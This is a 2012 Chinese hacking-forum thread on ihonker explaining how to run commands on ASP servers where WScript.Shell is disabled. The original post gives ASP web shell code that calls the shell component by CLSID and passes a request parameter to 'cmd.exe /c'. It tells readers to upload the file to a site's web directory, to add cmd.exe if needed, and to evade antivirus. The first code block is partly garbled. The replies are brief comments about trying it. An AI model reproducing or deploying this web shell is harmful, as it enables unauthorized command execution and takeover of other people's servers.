查看: 11672|回复: 9

没有Wscript.shell组件提权

[复制链接]
  • TA的每日心情

    2016-11-3 18:40
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2012-5-18 12:12:37 | 显示全部楼层 |阅读模式

    来源:情毒

    可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    要想让运行命令可以试试这种方法,成功率为五五之数。
    把下面代码复制:

    <%
    end if
    response.write(”")
    On Error Resume Next
    response.write oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    response.write(”")
    response.write(”")
    response.write(”
    “)
    response.write(”")
    %>

    保存为一个asp文件,然后传到网站目录上去
    运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    我用此成功运行过cacls命令。

    第二那就是运行时出错,可能限制某些代码执行

    无wscript.shell组件提权又一个方法

    <object runat=server id=oScriptlhn scope=page
    classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>

    <%if err then%>
    <object runat=server id=oScriptlhn scope=page
    classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>

    <%
    end if
    response.write(”<textarea readonly cols=80
    rows=20>”)
    On Error Resume Next
    response.write
    oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall

    response.write(”</textarea>”)
    response.write(”<form
    method=’post’>”)
    response.write(”<input type=text name=’c'
    size=60><br>”)
    response.write(”<input type=submit
    value=’执行’></form>”)
    %>
    保存为ASP,此代码可能被杀,请注意免杀。

    原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    回复

    使用道具 举报

    该用户从未签到

    发表于 2012-5-20 18:18:10 | 显示全部楼层
    下次试试看
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-5-21 20:56:26 | 显示全部楼层
    可以到shell上去试试 。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-5-2 11:56
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2012-5-21 21:10:42 | 显示全部楼层
    遇到很多都是关着WS组件,试试看。。。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-5-22 00:09:36 | 显示全部楼层
    有看头,我喜欢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-5-22 09:46:32 | 显示全部楼层
    回去试试看。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2022-3-19 16:56
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2012-5-24 00:28:56 | 显示全部楼层
    学习下
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-5-29 22:59:40 | 显示全部楼层
    还是看不懂。

    点评

    你最近回帖率 - - 汗颜  发表于 2012-5-29 23:19
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-5-29 23:21:45 | 显示全部楼层
    不错,学习了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-7-15 18:38:40 | 显示全部楼层
    无wscript.shell组件提权又一个方法  那个是怎用?我看懂
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-26 14:07 , Processed in 0.034225 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部